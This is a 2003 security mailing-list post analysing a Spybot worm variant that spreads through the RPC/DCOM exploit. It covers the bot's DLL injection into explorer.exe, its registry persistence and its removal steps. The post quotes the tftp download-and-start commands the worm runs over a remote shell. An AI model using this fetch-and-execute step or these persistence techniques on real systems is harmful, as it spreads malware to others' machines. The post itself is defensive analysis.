[Dshield] Fw: rpc sdbot

Joe Stewart jstewart at lurhq.com
Wed Aug 13 18:36:20 GMT 2003

On Wednesday 13 August 2003 01:57 pm, Geoff Shively wrote:
> Useful data on the buggar that combines msblast worm, sdbot and spybot.

Here's an analysis I did on it a couple of days ago (right before msblast
dropped). Symantec is reporting a second version which uses different
filenames. I'm sure there will be more.

From: Joe Stewart <jstewart at lurhq.com>
Subject: Spybot DDoS zombie using dll injection and RPC/DCOM exploit

A new variant of the Spybot IRC DDoS zombie which can spread via the
RPC/DCOM exploit has been discovered attempting to infect honeypots we
are monitoring. It includes the exploit code, a tftp server, a dll injector
and the IRC control component all in one self-contained package of 24064
bytes (UPX packed).

The trojan infects a system using the RPC/DCOM exploit shellcode from the
HD Moore exploit. It obtains a remote shell on port 4444 and runs the
following commands:

C:\WINNT\system32>tftp -i x.x.x.x GET winlogin.exe
C:\WINNT\system32>start winlogin.exe

x.x.x.x is the IP address of the zombie host which is making the connection.
Note that there is a bug in the code which makes the bot sometimes get its
own IP address as In these cases the trojan will be unable to
infect other systems.

winlogin.exe is a DLL injector. Note the similarity in the name to
the Windows system file winlogon.exe - make sure not to confuse the two,
as removing or damaging winlogon.exe will make Windows unable to start.
The presence of winlogin.exe may not necessarily indicate an infection;
other software may use this name (although it is questionable). A true
indicator of infection is registry keys referencing winlogin.exe in
HKLM\Software\Microsoft\Windows\CurrentVersion\Run which reappear
immediately after being deleted.

When winlogin.exe successfully starts on an infected system, it will extract
a DLL file to %windir%\system32 and inject it into the running explorer.exe
process. This dll has been known to use the name yuetyutr.dll but may be
renamed in future variants. The injector process will then exit, but the
injected DLL remains in memory. Since it runs in the process space of
explorer.exe, it will likely be undetected by personal firewalls.

The trojan removes the tftp.exe file so that the host system cannot be
re-infected using the same method. When this file is deleted, you may get
a message box popup that reads:

"Files that are required for Windows to run properly have been replaced
by unrecognized versions. To maintain system stability, Windows must
restore the original versions of these files."

Removal instructions:
This trojan runs as long as the main explorer.exe process is running, so
it is impossible to simply kill the process. It constantly maintains its
registry entries and will also recreate the injector file if it is removed.
It is even capable of running in safe mode, so removal is difficult. However,
by corrupting the injector file, we can make it impossible for the trojan to
inject itself on the next boot, allowing us to remove the associated
registry keys and files.

WARNING: This is an advanced procedure. Do not attempt this if you are
unsure of what you are doing. Entering the wrong command here could render
your computer unusable! Presence of the winlogin.exe file does not necessarily
indicate an infection. If you do not also find the yuetyutr.dll file on your 
system, or you do not see registry keys which re-insert themselves when
removed, you are advised against attempting this procedure.

Open a command prompt and enter the following commands:
cd %windir%\system32
echo 'go away' > winlogin.exe

This will corrupt the winlogin.exe file so it can no longer be run.

Reboot the computer, run regedit and remove the registry entries in
HKLM\Software\Microsoft\Windows\CurrentVersion\Run associated with

Remove %windir\system32\winlogin.exe and %windir\system32\yuetyutr.dll


Joe Stewart, GCIH 
Senior Security Researcher
LURHQ Corporation

More information about the list mailing list